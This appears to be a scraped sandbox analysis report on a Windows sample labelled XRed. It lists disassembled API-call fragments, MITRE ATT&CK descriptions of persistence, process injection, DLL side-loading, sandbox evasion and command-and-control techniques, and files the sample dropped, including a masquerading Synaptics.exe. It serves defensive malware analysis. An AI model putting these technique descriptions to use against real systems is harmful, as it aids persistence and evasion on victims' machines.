Part of subcall function 6C8D5CE0: GetProcessHeap.KERNEL32(00000000,?,?,6C8D5C6D,?,?,?,?,6C8D79A1,?,?,00000000,?,?,00000000), ref: 6C8D5CE8
Part of subcall function 6C8D5CE0: HeapSize.KERNEL32(00000000,?,6C8D5C6D,?,?,?,?,6C8D79A1,?,?,00000000,?,?,00000000,?,6C8D8077), ref: 6C8D5CEF

lstrlenW.KERNEL32(00000000,00000000,?,00000000), ref: 6C8D78CA

Memory Dump Source

Source File: 00000002.00000002.3581599658.000000006C8D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000002.00000002.3581572943.000000006C8D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581629470.000000006C8EF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581649198.000000006C8FA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581682201.000000006C8FC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c8d0000_UNK_.jbxd

Similarity

API ID: Heap$ProcessSizelstrlen
String ID:
API String ID: 3492610842-0
Opcode ID: 7298c152ff1c6359bfeabf41cb1ea1df73a89a6ce6b6c1f6fa33560e466151a1
Instruction ID: 6022fd52e17c32fb888d93be4088480f1872187482400693d5390c54246b33df
Opcode Fuzzy Hash: 7298c152ff1c6359bfeabf41cb1ea1df73a89a6ce6b6c1f6fa33560e466151a1
Instruction Fuzzy Hash: 31213433D00618BFCB228E69C940BADB7B5EF45328F238A65E85067754D735BD11CB80

Function 006914B2 Relevance: 1.3, APIs: 1, Instructions: 54stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,006921B8,?,00000000,?,00000000,?,006938BD,00000000,?,00000104), ref: 006914E4

Part of subcall function 00693B51: GetProcessHeap.KERNEL32(00000000,000001C7,?,006921DC,000001C7,80004005,8007139F,?,?,006D015F,8007139F,?,00000000,00000000,8007139F), ref: 00693B59
Part of subcall function 00693B51: HeapSize.KERNEL32(00000000,?,006921DC,000001C7,80004005,8007139F,?,?,006D015F,8007139F,?,00000000,00000000,8007139F), ref: 00693B60

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: Heap$ProcessSizelstrlen
String ID:
API String ID: 3492610842-0
Opcode ID: 658210014062d8f3121b804e1806eeedd479fc6c4f13ae98b2eeb1c6b2035f44
Instruction ID: 2cfef923299ae025e6004d340241ca2a0b2289067edc08deec2ad46ca5cb7310
Opcode Fuzzy Hash: 658210014062d8f3121b804e1806eeedd479fc6c4f13ae98b2eeb1c6b2035f44
Instruction Fuzzy Hash: E201687720021AAFCF215E14CC40FDA779FAF46B60F328229FA259F960D731EC118694

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: XRed

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

C:\ProgramData\Synaptics\RCX1D61.tmp

C:\ProgramData\Synaptics\Synaptics.exe

C:\ProgramData\Synaptics\Synaptics.exe:Zone.Identifier

C:\Users\user\AppData\Local\Temp\ENSvpt6.ini

C:\Users\user\AppData\Local\Temp\dd_vcredist_amd64_20250102144032.log

C:\Users\user\AppData\Local\Temp\mAsbqr4h.xlsm

C:\Users\user\AppData\Local\Temp\~$mAsbqr4h.xlsm

C:\Users\user\AppData\Local\Temp\~DFC577DADA6953CA4C.TMP

C:\Users\user\Desktop\._cache_file.exe

C:\Users\user\Documents\DVWHKMNFNN\YPSIACHYXW.xlsm

C:\Users\user\Documents\DVWHKMNFNN\~$YPSIACHYXW.xlsx

Windows Analysis Report
file.exe

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre